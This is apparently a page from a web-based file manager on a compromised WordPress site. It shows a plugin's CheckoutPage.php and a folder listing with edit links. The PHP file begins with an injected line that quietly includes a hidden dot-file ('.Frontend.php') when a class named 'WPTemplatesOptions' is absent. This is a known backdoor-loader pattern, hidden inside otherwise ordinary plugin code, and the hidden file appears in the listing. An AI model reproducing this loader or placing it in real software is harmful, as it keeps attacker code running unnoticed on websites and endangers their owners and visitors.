PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
wiloke-listing-tools
/
app
/
Frontend
<?php namespace WilokeListingTools\Frontend; if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class CheckoutPage { public function __construct() { add_action('wiloke/wilcity/addlisting/print-checkout', array($this, 'frontend')); } public function frontend(){ ?> <?php } }
[+]
..
[-] .Frontend.php
[edit]
[-] PriceRange.php
[edit]
[-] Gallery.php
[edit]
[-] User.php
[edit]
[-] SingleListing.php
[edit]
[-] GenerateURL.php
[edit]
[-] CheckoutPage.php
[edit]
[-] BusinessHours.php
[edit]
[-] EnqueueScripts.php
[edit]